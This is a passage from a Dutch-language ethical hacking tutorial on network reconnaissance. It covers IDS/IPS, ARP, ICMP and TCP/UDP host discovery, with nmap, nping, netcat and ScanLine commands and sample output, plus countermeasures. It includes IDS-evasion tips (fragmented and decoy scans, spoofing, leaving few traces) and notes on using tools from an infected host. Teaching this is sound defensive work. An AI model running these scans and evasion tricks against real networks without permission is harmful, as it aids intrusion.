netwerk. Een NIDS wordt geplaats op een monitoring poort, dit systeem zal dus passief uw netwerk
monitoren en zal dus niet de mogelijkheid hebben om de scan te blokkeren. Een NIDS zal niet alleen
effectief zijn tegen scans maar ook als iemand een worm of een virus probeert te verspreiden over uw
netwerk. De NIDS zal alles wat hij tegenkomt loggen en in een databank steken. Als er zaken gebeuren
waarvan de attentie van de netwerkbeheerder nodig is zal deze NIDS een alert doorsturen naar de
netwerkbeheerder waarop de netwerkbeheerder kan reageren.
De volgende twee NIDS worden veel gebruikt, omdat ze goed en gratis zijn:
Snort: dit systeem is te vinden via de volgende url: http://www.snort.org/.
Bro-IDS: dit systeem is te vinden via de volgende url: http://www.bro.org/.
4.2.2 IPS Een IPS is een systeem dat zal detecteren of er iemand een scan probeert uit te voeren op uw netwerk.
Het verschil tussen een NIDS en een IPS is dat een IPS inline staat, dus dat het verkeer door hem moet
gaan vooraleer het je netwerk bereikt. Hij doet dit door de persoon die de scan uitvoert te blokkeren.
Hij kan dit enerzijds doen door al het verkeer van de bron tegen te houden en anderzijds door
aanpassingen te doen in de firewall of aan de router. Wat een IPS ook kan doen is een patch
doorvoeren waardoor gevoelige software aangepast wordt en zo niet meer gevoelig is voor aanvallen.
Een IPS kan ook als er een e-mail binnenkomt met een geïnfecteerd bestand als bijlage (een virus of
een worm). Dan kan hij deze bijlage van de e-mail verwijderen en dan de e-mail alsnog laten aankomen
bij de bestemming.
De volgende IPS wordt veel gebruikt omdat hij goed en gratis is:
Snort: dit systeem is te vinden via de volgende url: http://www.snort.org/.
4.2.3 Conclusie Het is goed om zowel een IPS als een IDS te hebben om je netwerk goed te kunnen beveiligen. Dit
omdat ze elk op een andere plaats in het netwerk staan. Een IPS zal je meestal op de rand van je
netwerk plaatsen om alles dat van buitenaf komt tegen te houden. Een IDS zal je meestal achter je
firewall plaatsen zodat deze het interne verkeer kan analyseren, hierdoor zal je ook een goed zicht
krijgen op het verkeer dat zich binnen de onderneming plaatsvindt.
5 Conclusie Aanvallers kunnen op vele verschillende manieren meer te weten komen over een bedrijf of een
individu. Er zijn sommige aanvallen waar je weinig aan kunt doen en andere die je helemaal kan
blokkeren. De IT-wereld verandert dagelijks, er zullen dus ook in de toekomst nog vele manieren
41
bijkomen die aanvallers kunnen gebruiken om informatie over een individu of een bedrijf te weten te
komen.
Het belangrijkste als aanvaller is dat je anoniem blijft, zodat de mensen waartegen je een aanval wilt
doen niets op voorhand doorhebben.
42
43
Stap 2: Scanning 1 Algemene Inleiding In de vorige stap hebben we het gehad over hoe je een bedrijf in kaart moet brengen en hoe je
verschillende gevoelige gegevens kan te weten komen over een bedrijf. In deze stap gaan we hierin
verder, hier zullen we verschillende scans uitvoeren om zo het netwerk van het betreffende bedrijf in
kaart te brengen. We zullen ook te weten kunnen komen hoe we door firewalls kunnen dringen en
welke apparaten met welke versie in het netwerk actief zijn.
2 Host Discovery Ondertussen zijn we er al achter gekomen welke IP-ranges er gehanteerd worden in het bedrijf. Om
echter exact te weten te komen achter welke IP-adressen apparaten actief zijn moeten we een scan
van het netwerk uitvoeren. Dit wordt ook wel een ping-sweep of host-discovery genoemd.
Als je het woord “ping” hoort, denk je meteen aan ICMP, maar bij de term “ping-sweep” wordt er
ook gebruik gemaakt van ARP, ICMP, TCP en UDP. Dit zijn verschillende manieren die zullen
besproken worden in de volgende hoofdstukken.
3 ARP Host Discovery
3.1 MAC-ADRES Elk toestel dat verbonden is met het internet heeft een uniek nummer. Dit uniek nummer wordt een
MAC-adres genoemd, dit adres wordt ook wel een hardware-adres genoemd.
Dit MAC-adres behoort tot de data-link laag van het OSI-model.
Dit MAC-adres is meestal opgeslagen in de read-only memory van de network interface card (NIC).
Dit MAC-adres is toegewezen aan de NIC door de fabrikant.
Een voorbeeld van een MAC-adres is: 24-B6-FD-4E-6F-BF. Uit dit MAC-adres kan je afleiden dat het
een toestel van Dell is. Dit kan je afleiden uit de eerste 6 hexadecimale cijfers. De betekenis van deze
6 hexadecimale cijfers kan je manueel opzoeken in:
http://standards.ieee.org/develop/regauth/oui/oui.txt of een tool gebruiken zoals
http://www.coffer.com/mac_find/.
Meer informatie over het MAC-adres: http://en.wikipedia.org/wiki/MAC_address.
44
3.2 ARP-protocol Host-discovery kan je doen door het ARP protocol te gebruiken. Het ARP-protocol is een protocol dat
MAC-adressen zal vertalen naar IP-adressen. Dit ARP-protocol maakt het mogelijk dat computers
binnen hetzelfde netwerk met elkaar kunnen communiceren zonder hun MAC-adres te kennen.
ARP maakt gebruik van een broadcast. Hierdoor kan je ARP-scanning enkel gebruiken als je een scan
wilt uitvoeren op hetzelfde broadcastdomein waarin jij aanwezig bent. Als jij iets wilt versturen naar
een IP adres, bijvoorbeeld 192.168.1.2. Dan zal ARP het volgende doen:
Eerst zal ARP zoeken in zijn ARP-tabel naar het IP-adres. De ARP-tabel kan je vinden door het
volgende commando in te typen in een Windows computer:
Commando:
C:\Users\nathan> arp –a
Bekomen resultaat:
Interface: 192.168.1.8 --- 0x2
Internet Address Physical Address Type
192.168.1.1 7c-03-d8-c2-31-b8 dynamic
192.168.1.16 cc-08-e0-20-f8-74 dynamic
192.168.1.255 ff-ff-ff-ff-ff-ff static
255.255.255.255 ff-ff-ff-ff-ff-ff static
In deze tabel staat het IP-adres met daarnaast het overeenkomstige MAC-adres.
Als het IP-adres nog niet in de tabel staat zal het ARP protocol het volgende doen:
Om te weten te komen welk MAC-adres achter het IP-adres 192.168.1.2 zit zal ARP een ARP Request
Broadcast uitsturen. Dit bevat de volgende gegevens:
source MAC: 00:24:d7:c9:5f:f8, source IP: 192.168.1.3
destination MAC: ff:ff:ff:ff:ff:ff (broadcast), destination IP: 192.168.1.2
Elke computer die in het netwerk staat zal deze aanvraag ontvangen omdat het een broadcast is. Maar enkel de computer (NIC) waarvoor het bestemd is, zal antwoorden met een unicastpakket. Dit is een pakket dat enkel naar de doel MAC-adres gestuurd wordt. source MAC: 00:16:ce:29:81:22, source IP: 192.168.1.2
destination MAC: 00:24:d7:c9:5f:f8, destination IP: 192.168.1.3
Voor meer informatie over het ARP-protocol: http://en.wikipedia.org/wiki/Address_Resolution_Protocol
45
3.3 ARP-netwerk scan Bij een ARP-netwerk scan zal je naar elke host binnen het netwerksegment een ARP request sturen.
Van al de toestellen die een ARP reply terugsturen weet je of ze actief in het netwerk aanwezig zijn.
Hierdoor ben je ook van elk toestel het MAC-adres te weten gekomen.
Een ARP-netwerk scan kan je met de volgende tools doen. Deze tools zullen in hoofdstuk 6 uitgebreid
worden besproken:
UNIX/Linux:
ARP-scan van NTA Monitor (www.nta-monitor.com/tools/arp-scan/ )
root@bt:~# ./arp-scan 192.168.1.0/24
Network Mapper (Nmap) van Fyodor (www.nmap.org )
root@bt:~# nmap –sn –PR 192.168.1.0/24
Windows:
Network Mapper (Nmap) van Fyodor (www.nmap.org )
nmap –sn –PR 192.168.1.0/24
Cain van Oxid (www.oxid.it/cain.html)
sniffer > rechtermuisklik > scan MAC-adressen
46
4 ICMP Host Discovery ICMP (Internet Control Message Protocol) ook wel een ping genoemd. Dit is een protocol dat
gebruikt wordt om te identificeren of een toestel actief is op het netwerk. Het wordt door hackers
gebruikt om waardevolle informatie over het netwerk te weten te komen, maar het is ook een
protocol dat netwerkbeheerders gebruiken om problemen op het netwerk te troubleshooten.
Hierdoor zijn er veel netwerken die het gebruik van het ICMP protocol uitgesloten hebben, en veel
netwerken die dit wel toestaan. Je zal met deze vorm van host discovery niet altijd het verwachte
resultaat bereiken.
Je kan verschillende soorten ICMP-berichten (pings) uitvoeren. Enkele veelgebruikte pings zijn:
Message Type
0 Echo Reply
3 Destination Unreachable
4 Source Quench
5 Redirect
8 Echo Request
11 Time Exceeded
12 Parameter Problem
13 Timestamp
14 Timestamp Reply
15 Information Request
16 Information Reply
17 Address Mask Request
18 Address Mask Reply
Een traditionele ping is een ECHO REQUEST. Hierbij zal de verzender een ECHO REQUEST uitsturen en
wachten tot hij een ECHO_REPLY terugkrijgt. Als hij een ECHO_REPLY terugkrijgt wilt het zeggen dat
het toestel actief op het netwerk aanwezig is.
Commando:
ping 192.168.1.1
Resultaat:
Pinging 192.168.1.1 with 32 bytes of data:
Reply from 192.168.1.1: bytes=32 time<1ms TTL=64
Reply from 192.168.1.1: bytes=32 time<1ms TTL=64
Reply from 192.168.1.1: bytes=32 time<1ms TTL=64
Reply from 192.168.1.1: bytes=32 time<1ms TTL=64
Ping statistics for 192.168.1.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
Voor meer informatie over het ICMP protocol:
http://en.wikipedia.org/wiki/Internet_Control_Message_Protocol
47
4.1 ICMP Host Discovery Tegenmaatregel Het is belangrijk om het ICMP protocol tegen te houden op het netwerk. Zo krijgt de hacker
het moeilijker om te weten te komen welke apparaten er aanstaan en bij welke ze kunnen proberen
binnen te breken.
4.1.1 Gebruik van een Intrusion Detection System Er bestaan veel intrusion detection systemen die detecteren of er een ping sweep wordt uitgevoerd.
Maar deze systemen beperken zich tot de detectie van zo een aanval. Dit zijn op zich wel goede tools
maar zolang er geen persoon kijkt naar wat het intrusion detection systeem ontdekt, zullen de
aanvallen zomaar kunnen doorgaan.
Windows: Snort (http://www.snort.org/)
UNIX/Linux:
Scanlogd (http://openwall.com/scanlogd/)
Courtney (http://packetstormsecurity.com/UNIX/audit/courtney-1.3.tar.Z)
Ippl (http://pltplp.net/ippl/)
Protolog (http://packetstormsecurity.com/UNIX/loggers/protolog-1.0.8.tar.gz)
4.1.2 Preventie van ping sweeps Als je ICMP verkeer toelaat in je netwerk, kan er een DOS aanval plaatsvinden.
Het is ook mogelijk om andere data te verstoppen in een ICMP ECHO pakket. Het is dus aangeraden
om het ICMP verkeer tegen te houden aan de rand van je netwerk. Je kan dit doen met een tool zoals
loki2.
Voor meer informatie over het loki2: http://www.phrack.org/issues.html?issue=51&id=6.
Als je je netwerk wil beveiligen, kan je ervoor kiezen om maar enkel bepaalde types ICMP berichten
toe te laten. Zoals besproken eerder in dit hoofdstuk kan je zien dat er vele verschillende ICMP
berichten mogelijk zijn. Je kan ervoor kiezen om enkel die door te laten die je zelf nuttig vindt om te
troubleshooten, zoals ICMP ECHO_REPLY, HOST_UNREACHABLE en TIME_EXCEEDED.
Het is nog veiliger als het ICMP verkeer door jouw ISP kan geblokkeerd worden, door gebruik te
maken van acces control list (ACL). Hierdoor kan de ISP aan u een ping sturen om uw connectiviteit
na te kijken en kunnen andere (buitenstaanders) dit niet doen.
48
5 TCP / UDP Host Discovery Zoals uitgelegd in hoofdstuk 4 is gebruik maken van het ICMP protocol niet altijd de beste keuze.
Gelukkig zijn er nog andere manieren om een netwerkscan uit te voeren. Als het netwerk het ICMP
protocol niet toelaat kan je TCP of UDP host discovery toepassen.
Met TCP en UDP host discovery zal je proberen een connectie te maken met verschillende TCP- en
UDP-poorten. Hieruit kan je dan afleiden of deze poorten open, gefilterd of gesloten zijn.
Bijvoorbeeld: een webserver zal gebruik maken van de service HTTP op poort 80 of HTTPS op poort
443. En een webserver is meestal verbonden met het extern netwerk zodat mensen van buiten het
bedrijf ook de webpagina van het bedrijf kunnen raadplegen. Maar om veiligheidsredenen is het heel
waarschijnlijk dat het ICMP protocol afgesloten is. In dit geval kan je dus een TCP poortscan doen van
poort 80 of poort 443 op die webserver. Als je een antwoord krijgt op één van deze twee poorten,
constateer je dat die server actief is op de betreffende poort.
Een nadeel van TCP en UDP host discovery is dat er zeer veel poorten zijn die kunnen gebruikt
worden: van poort 1 tot poort 49151. Als je dus een TCP of UDP scan wilt uitvoeren kan je kiezen
voor een paar poorten (de meest gebruikte) of al de mogelijke poorten. Het beste is, zo gericht
mogelijk de scans uit te voeren om niet teveel argwaan te wekken. Als je al de poorten probeert te
scannen heb je het meeste kans op succes, maar dan zal de verantwoordelijk van het netwerk waarin
je de poortscan uitvoert ook weten dat er een poortscan plaatsgevonden heeft. En dan kan deze
persoon maatregelen treffen.
Voor meer informatie over de verschillende mogelijke poorten:
http://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers.
5.1 Poort scanning
5.1.1 Verschil tussen TCP en UDP In de volgende tabel wordt het TCP protocol vergeleken met het UDP protocol. Beide protocollen
worden gebruikt voor verschillende functies in het netwerk.
Voorbeeld:
- TCP poort 23: Telnet
- TCP poort 80: HTTP
- UDP poort 53: DNS
49
Uitleg TCP UDP
Staat voor Transmission Control Protocol User Datagram Protocol of Universal Datagram Protocol
Connectie Connectie georiënteerd, stelt eerst een connectie op voordat er gegevens kunnen worden verstuurd.
Connectieloos er zal niet eerste een connectie opgesteld worden.
Gebruik TCP zal veelal gebruikt worden door applicaties die zeker moeten zijn dat de verbinding behouden wordt. De snelheid is minder belangrijk.
UDP wordt veelal gebruikt door applicaties waarvoor het snel moet gaan.
Voorbeelden FTP, HTTP, HTTPS, SMTP, Telnet Live video streaming, VoIP, DNS
Snelheid van de overdracht Trager als UDP omdat er bij TCP aan foutcontrole gedaan wordt
Sneller als TCP omdat er bij UDP niet aan foutcontrole gedaan wordt.
Betrouwbaarheid Bij TCP is het belangrijk dat alle pakketten aankomen op hun bestemming. Als dit niet gebeurt, zullen ze opnieuw verzonden worden.
Bij UDP kan het zijn dat er enkele pakketten wegvallen. Aangezien de snelheid hier belangrijk is zullen ze niet opnieuw verstuurd worden.
Gewicht TCP is een protocol dat meer van het netwerk vraagt als UDP. TCP heeft eerst en vooral 3 pakketten nodig om een connectie op te zetten, voordat er data kan gestuurd worden.
UDP is een lichtgewicht protocol.
Foutcontrole TCP doet aan foutcontrole. UDP doet niet aan foutcontrole.
Velden in een pakket 1. Sequence Number
2. ACK Number
3. Data offset
4. Reserved
5. Control bit
6. Window
7. Urgent pointer
8. Options
9. Padding
10. Check Sum
11. Source port
12. Destination port
1. Length
2. Source port
3. Destination port
4. Check sum
Handshake Three-way-handshake
SYN
SYN-ACK
ACK
Geen handshake want het is een connectieloos protocol.
Tabel 5-1 Verschil tussen TCP en UDP
Bron: http://www.diffen.com/difference/TCP_vs_UDP
50
Bij poortscanning zal je pakketten naar TCP en UDP poorten sturen, hier kan je van afleiden welke
poorten aan het “luisteren” zijn. Op die manier kan je ook services achterhalen want achter elke
poort zit een bepaalde service. Bovendien kan je ook te weten komen welke versie van het
besturingssysteem en welke versie van service er gebruikt wordt.
Een poort die aan het “luisteren” is, is een weg naar binnen in het systeem.
Met een poortscan kan je het volgende in kaart brengen:
De luisterende TCP- en UDP-services
Het type van besturingssysteem
De specifieke versies van een service
5.1.2 Programma’s waarmee je TCP en UDP scans kan uitvoeren Er zijn veel tools waarmee je poortscans kan uitvoeren. De tools die besproken zullen worden zijn,
Nmap, ScanLine en Netcat.
5.1.2.1 Nmap
Nmap doet aan intelligente poortscans. Dit wil zeggen dat ze eerst met een ping of een ARP-scan zal
nagaan of de toestellen die je wil scannen, aangesloten zijn op het netwerk. Als dit het geval is, dan
zal de poortscan beginnen.
5.1.2.2 ScanLine
ScanLine is een tool die gebruikt wordt op Windows computers via het opdrachtprompt. Je kan
hiermee scans uitvoeren. Dit is een tool dat niet hoeft geïnstalleerd worden op een systeem. Dit
maakt het gemakkelijk om binnen te sluizen in een systeem dat vertrouwd is op een netwerk en
hiermee dan scans uitvoeren.
5.1.2.3 Netcat
Netcat is een “old school” tool dat voor veel verschillende doeleinden kan gebruikt worden.
Aangezien Netcat over zoveel functionaliteiten beschikt wordt het ook wel “het Zwitsers zakmes” van
hacking genoemd. Het is een tool die weinig sporen zal achterlaten als deze een poortscan uitvoert.
Je kan deze tool dus het best gebruiken als je zo weinig mogelijk sporen wilt achterlaten op een
systeem.
51
6 Netwerk verkenning tools
6.1 Nmap Nmap is een zeer krachtige tool als het gaat over het scannen van een netwerk. Nmap heeft zeer veel
opties die je kan aan en uitzetten. Dit zijn er teveel om hier te bespreken, ik zal enkel de belangrijkste
bespreken.
6.1.1 ICMP In dit hoofdstuk zullen de variabelen besproken worden die met Nmap meegestuurd kunnen worden
om verschillende ICMP scans uit te voeren.
nmap –sn 192.168.1.1
Als non root user:
TCP ping van poort 80 en poort 443 zoals beschreven in 3.5
Als root user:
Geen poort scan
Stuurt een ICMP ECHO REQUEST
ARP scan zoals beschreven in 3.3
TCP ping van poort 80 en poort 443 zoals beschreven in 3.5
nmap –PE 192.168.1.1
Stuurt een ICMP ECHO REQUEST
6.1.2 TCP/UDP poort scanning In dit hoofdstuk zullen de variabelen besproken worden die met Nmap meegestuurd kunnen worden
om verschillende poortscans uit te voeren. Zie hoofdstuk 5.1.3 voor meer informatie over poortscans
met Nmap.
Er zijn verschillende scan types die je kan uitvoeren. We zullen deze scans uitvoeren met de tool
Nmap. Je kan hiermee de volgende poortscans uitvoeren:
6.1.2.1 Verschillende types poortscan
Negeer Host Discovery (-Pn)
Negeer de Host Discovery, moest je dit niet doen dan zou je scan eerst een ICMP host
discovery doen en dan enkel een poortscan doen bij de apparaten die actief zijn. Onze
bedoeling is net de hosts die niet te vinden zijn met een host discovery te vinden.
Commando: nmap –Pn 192.168.1.1
TCP Connect scan (-sT):
Een volledige three-way handshake (SYN, SYN/ACK, ACK)
Duurt langer dan andere scans
Heeft meer kans om gelogd te worden door het gescande systeem
Heeft geen administrator privileges nodig om deze scan uit te voeren
Commando: nmap –sT 192.168.1.1
52
TCP SYN scan (-sS):
Een halve three-way handshake (SYN, SYN/ACK)
Er wordt een SYN pakket verstuurd:
o als er een SYN/ACK terugkomt, weet je dat de poort aan het luisteren is
o als er een SYN/RST terugkomt, weet je dat de poort niet aan het luisteren is
Heeft minder kans om gelogd te worden door het gescande systeem
Kan gezien worden als een DOS aanval, omdat veel half open connecties gestart worden
Commando: nmap –sS 192.168.1.1
TCP FIN scan (-sF):
Er wordt een FIN pakket gestuurd
Er komt een RST pakket terug van al de gesloten poorten
Deze techniek werkt meestal op UNIX gebaseerde systemen
Commando: nmap –sF 192.168.1.1
TCP Xmas Tree scan (-sX):
Er wordt een FIN, URG en PUSH pakket gestuurd
Er komt een RST pakket terug van al de gesloten poorten
Commando: nmap –sX 192.168.1.1
TCP Null scan (-sN):
Er wordt een een serie van pakketten gestuurd
o met een sequence number van 0
o zonder flags
Omdat er geen flags aanwezig zijn kan het zijn dat deze scan door een firewall kan gaan
omdat deze firewall zal controleren op de flags
Er komt een RST pakket terug van al de gesloten poorten
Commando: nmap –sN 192.168.1.1
Bron: http://www.plixer.com/blog/scrutinizer/the-null-scan-you%E2%80%99re-being-
watched/
TCP ACK scan (-sA):
Er wordt een ACK pakket gestuurd
Het kan je helpen om na te gaan of de firewall een simpele pakket filter is die alleen ACK
pakketten doorlaat, omdat hij denkt dat er al een deel van de “three way handshake”
voltooid is.
Het kan je helpen nagaan of het gaat om een statefull firewall die aan advanced pakket
filtering doet
Commando: nmap –sA 192.168.1.1
53
TCP Windows scan (-sW):
Er wordt een ACK pakket gestuurd
Het wordt meestal niet gelogd door het systeem
Er worden geen sessies geopend, dus er is niet veel netwerkverkeer
Omdat er enkel een ACK gestuurd wordt is er een mogelijkheid dat deze scan door de firewall
zal gaan
Er zal een RST pakket terugkomen van elke poort ook als deze toe is. Aan deze RST pakketten
zal een “window size” bijkomen:
o “Window size 0”: wil zeggen dat de poort toe is
o “Window size > 0”: wil zeggen dat de poort open is
Heeft administrator privileges nodig op het systeem vanwaar je je scan uitvoert
Commando: nmap –sW 192.168.1.1
Bron: http://www.networkuptime.com/nmap/page3-13.shtml
TCP RPC scan (-sR of -sV):
Er wordt een Remote Procedure Call (RPC) Null pakket gestuurd
Met deze scan kan je nagaan op welke computers RPC applicaties staan met hun
versienummer.
Commando: nmap –sR 192.168.1.1
Commando: nmap –sV 192.168.1.1
Bron: http://www.networkuptime.com/nmap/page3-14.shtml
UDP scan (-sU):
Dit is een trage scan, de resultaten zijn dan ook niet altijd even betrouwbaar
Er wordt een UDP pakket gestuurd:
o als er een “ICMP port unreachable” terugkomt dan is de poort gesloten (type 3 code
3)
o als er een “ICMP port unreachable” terugkomt dan is de poort gefilterd (type 3 code
1, 2, 9, 10 of 13)
o als er niets terugkomt, dan is de poort open of gefilterd
Commando: nmap –sU 192.168.1.1
Bron: http://nmap.org/book/man-port-scanning-techniques.html
54
6.1.2.2 Uitbreiding: mogelijkheden van Nmap
Bij de volgende poortscan heb ik gebruik gemaakt van het TCP SYN type poortscan, je kan dit type
poortscan vervangen door het type die je wil gebruiken. Bovendien kan je bij de IP-adressen ook
altijd een subnet masker toevoegen. Dit subnet masker moet dan wel aan het IP-adres kleven.
TCP SYN Scan op een specifieke poort (-sS –p 22 –open)
Een poortscan maar enkel op poort 22 omdat deze poort vaak gebruikt wordt. Deze poort is
SSH, enkele andere veel voorkomende poorten zijn: SMTP (25), POP (110), AUTH (113), IMAP
(143)
Commando: nmap -sS -p 22 –open 192.168.1.1
TCP SYN Scan gefragmenteerd (-f)
Door “-f” te gebruiken zal de TCP header gefragmenteerd worden over verschillende
pakketten. Hierdoor wordt het moeilijker voor de firewall of IDS systeem om deze scan te
onderscheppen.
Commando: nmap –sS –f 192.168.1.1
TCP SYN Scan met een afleidingsmanoeuvre (-D)
Door “-D” te gebruiken zullen er nog andere scans gebeuren van een ander IP-adres, dit om
het systeem af te leiden van de echte scan.
Als tweede IP-adres geef je het best een IP-adres van een legitieme server op, die zich
bevindt op hetzelfde netwerk, waarvan hij wel scans aanvaardt.
Commando: nmap –sS 192.168.1.1 –D 192.168.1.2
TCP SYN Scan, output in document plaatsen (-oN outfile.txt)
Als de scan afgelopen is zal Nmap een bestand aanmaken waarin hij zal wegschrijven, exact
wat er op het scherm verschijnt
Het bestand heet outfile.txt
Commando: nmap –sS 192.168.1.1 -oN outfile.txt
TCP SYN Scan, output in een tab-gelimiteerd bestand (-oG outfileTAB.txt)
Resultaat van je scan in een tab-gelimiteerd file steken
Het bestand heet outfileTAB.txt
Commando: nmap –sS 192.168.1.1 -oG outfileTAB.txt
TCP SYN Scan, output in een bestand met XML formaat(-oX outfileXML.txt)
Resultaat van je scan in XML formaat opslaan
Het bestand heet outfileXML.txt
Commando: nmap –sS 192.168.1.1 -oX outfileXML.txt
TCP SYN Scan, output in gewoon-, tab-gelimiteerd- en XML- formaat (-oA outfile.txt)
Resultaat van je scan in zowel, normaal, tab-gelimiteerd en XML formaat opslaan. In dit geval
zijn er vier bestanden aangemaakt.
Deze bestanden heten:
o outfile.txt.nmap, in normaal formaat
55
o outfile.txt.gnmap, in tab-gelimiteerd formaat
o outfile.txt.xml, in XML formaat
Commando: nmap –sS 192.168.1.1 -oA outfile.txt
6.2 Hping3 en Nping Hping3 is een tool die kan gebruikt worden voor zeer veel uiteenlopende doeleinden. Vermits we
ICMP scan en TCP/UDP poortscans besproken hebben, zal hij in dit geval gebruikt worden om
poorten te scannen en om host discovery toe te passen. Het nadeel aan Hping3 is dat het niet meer
onderhouden wordt. De laatste keer dat er updates zijn toegepast dateren van 2005. Aangezien dit
toch een zeer goede tool is, hebben Luis Martin Garcia en Fyodor beslist om zijn functionaliteit toe
voegen aan een tool dat bij Nmap hoort. Deze tool heet Nping. Nping is dus een geüpdatet versie van
Hping3.
6.2.1 ICMP scan In het volgend voorbeeld zal Nping gebruikt worden om twee ICMP berichten te sturen van het type
timestamp.
Commando: Sudo nping -c 2 --icmp --icmp-type time 192.168.1.1
Resultaat:
root@bt:~# nping -c 2 --icmp --icmp-type time 192.168.1.1
Starting Nping 0.6.25 ( http://nmap.org/nping ) at 2013-12-23 11:11 CET
SENT (0.0053s) ICMP 192.168.1.18 > 192.168.1.1 Timestamp request
(type=13/code=0) ttl=64 id=60735 iplen=40
RCVD (0.0061s) ICMP 192.168.1.1 > 192.168.1.18 Timestamp reply
(type=14/code=0) ttl=64 id=64725 iplen=40
SENT (1.0063s) ICMP 192.168.1.18 > 192.168.1.1 Timestamp request
(type=13/code=0) ttl=64 id=60735 iplen=40
RCVD (1.0072s) ICMP 192.168.1.1 > 192.168.1.18 Timestamp reply
(type=14/code=0) ttl=64 id=64726 iplen=40
Max rtt: 0.750ms | Min rtt: 0.727ms | Avg rtt: 0.738ms
Raw packets sent: 2 (80B) | Rcvd: 2 (92B) | Lost: 0 (0.00%)
Tx time: 1.00237s | Tx bytes/s: 79.81 | Tx pkts/s: 2.00
Rx time: 1.00305s | Rx bytes/s: 91.72 | Rx pkts/s: 1.99
Nping done: 1 IP address pinged in 1.01 seconds
56
6.2.2 TCP/UDP port scanning Met Nping kan je een poortscan uitvoeren zoals beschreven in 3.5. aangezien Nping een brede tool is
zal je ook meer zien in de output. Je kan dit doen met het volgende commando:
Sudo nping –c 2 –tcp –p 22 –-flags syn 192.168.1.23
Met dit commando zal je 2 requests sturen op TCP poort 22. Je zal dan ook vragen om de pakketten
te taggen met S of SA.
Bekomen resultaat:
root@bt:~# nping -c 2 -tcp -p 22 --flags syn 192.168.1.1
Starting Nping 0.6.25 ( http://nmap.org/nping ) at 2013-12-23 11:10 CET
SENT (0.0352s) TCP 192.168.1.18:52417 > 192.168.1.1:22 S ttl=64 id=25621
iplen=40 seq=1440928595 win=1480
RCVD (0.0375s) TCP 192.168.1.1:22 > 192.168.1.18:52417 RA ttl=64 id=14225
iplen=40 seq=0 win=0
SENT (1.0357s) TCP 192.168.1.18:52417 > 192.168.1.1:22 S ttl=64 id=25621
iplen=40 seq=1440928595 win=1480
RCVD (1.0366s) TCP 192.168.1.1:22 > 192.168.1.18:52417 RA ttl=64 id=14226
iplen=40 seq=0 win=0
Max rtt: 2.222ms | Min rtt: 0.729ms | Avg rtt: 1.475ms
Raw packets sent: 2 (80B) | Rcvd: 2 (92B) | Lost: 0 (0.00%)
Tx time: 1.00180s | Tx bytes/s: 79.86 | Tx pkts/s: 2.00
Rx time: 1.00251s | Rx bytes/s: 91.77 | Rx pkts/s: 1.99
Nping done: 1 IP address pinged in 1.04 seconds
Nping bevat ook nog andere functionaliteiten zoals:
Spoofing source MAC-adres
Spoofing source IP adres
Vele zaken die je kan gebruiken om je identiteit in een netwerk te verstoppen
57
6.3 ScanLine Scanline is een kleine CLI tool die gebruikt wordt op Windows computers. Hierdoor is het gemakkelijk
om binnen te sluizen in een geïnfecteerd systeem. Je kan er scans mee uitvoeren zonder dat het op
het systeem geïnstalleerd is.
Met dit commando zal je een scan doen van de TCP poorten 21,22,23,25 en 8080. Door “–p” te
gebruiken zal je geen ping doen op voorhand, omdat je al weet dat dit toestel actief is in je netwerk.
Commando: sl -t 21,22,23,25,8080 -p 192.168.1.1
Resultaat:
ScanLine (TM) 1.01
Copyright (c) Foundstone, Inc. 2002
http://www.foundstone.com
Scan of 1 IP started at Mon Dec 23 17:25:22 2013
--------------------------------------------------------------------
192.168.1.1
Responds with ICMP unreachable: No
TCP ports: 23 8080
--------------------------------------------------------------------
Scan finished at Mon Dec 23 17:25:26 2013
1 IP and 5 ports scanned in 0 hours 0 mins 4.03 secs
Gedownload van: http://www.mcafee.com/us/downloads/free-tools/scanline.aspx
6.4 netcat Netcat is een CLI tool die al heel lang bestaat. Dit is een tool die vooral nuttig is als je de zaken die je
achterlaat (de footprint) wilt beperken. Deze tool heeft zeer veel functionaliteiten, de functionaliteit
die hier zal besproken worden is de TCP en UDP poortscan functionaliteit.
6.4.1 TCP poortscan Met dit commando zal je een poortscan doen van de poorten 1 tot 100. Met “-v” laat je weten dat je
het moeten laten zien op je scherm, met “-z” laat je weten dat hij een poortscan moet uitvoeren. En
“-w2” is de time-out die je instelt per connectie.
Commando: nc -v -z -w2 192.168.1.1 1-100
Resultaat:
(UNKNOWN) [192.168.1.1] 80 (http) open
(UNKNOWN) [192.168.1.1] 23 (telnet) open
58
6.4.2 UDP poortscan Met dit commando zal je een poortscan doen van de UDP poorten 53, 67 en 68. Aangezien netcat
standaard een TCP poortscan uitvoert moet je “-u” toevoegen om te laten weten dat je een UDP
poortscan wil uitvoeren. Met “-v” laat je weten dat je het moet laten zien op je scherm, met “-z”
laat je weten dat hij een poortscan moet uitvoeren. En “-w2” is de time-out voor elke connectie.
Commando: nc -u -v -z -w2 192.168.1.1 53 67 68
Resultaat:
(UNKNOWN) [192.168.1.1] 53 (domain) open
(UNKNOWN) [192.168.1.1] 67 (bootps) open
(UNKNOWN) [192.168.1.1] 68 (bootpc) open
Netcat is te downloaden van: http://joncraton.org/blog/46/netcat-for-windows
6.5 SuperScan Dit is een GUI waarmee je netwerk scans kan uitvoeren. Je kan hier heel veel zaken aan- en uit-
zetten. De scans waartoe ik me beperkt heb zijn ICMP ping sweeps. Ik heb dit gedaan met SuperScan
4.1 en met SuperScan 3.0. Ik ben wisselende resultaten tegengekomen. Je kan de verkregen
informatie van de scan zien als een HTML bestand, wat het overzichtelijk maakt.
Met SuperScan kan je ook een UDP en TCP host discovery doen. Je moet dan de checkbox voor ICMP
uitzetten.
De tools zijn enkel ontwikkeld voor Windows en zijn te downloaden van:
SuperScan 3.0: http://www.mcafee.com/us/downloads/free-tools/superscan3.aspx
SuperScan 4.1: http://www.mcafee.com/us/downloads/free-tools/superscan.aspx
Zoals u kan zien, zijn er twee versies van deze software. Ik heb ze beide uitgeprobeerd en SuperScan
4.1 werkte niet zoals verwacht. Hij liet steeds zien dat er maar 1 host gevonden is. Zoals u kan zien in
de foto hieronder:
Afbeelding 6-1 Superscan 4.1
59
SuperScan3 werkt wel naar behoren. De scan met SuperScan3 leverde het volgende resultaat op:
Afbeelding 6-2 Superscan 3.0
6.6 Poort scans Tegenmaatregels Een poortscan is een belangrijke scan voor een hacker, om het systeem dat hij wil aanvallen
te identificeren. Voor een verdediger is het moeilijk om zo een poortscan tegen te houden. Er zijn
sommige technieken die je kan gebruiken om een soortgelijke poortscan tegen te houden.
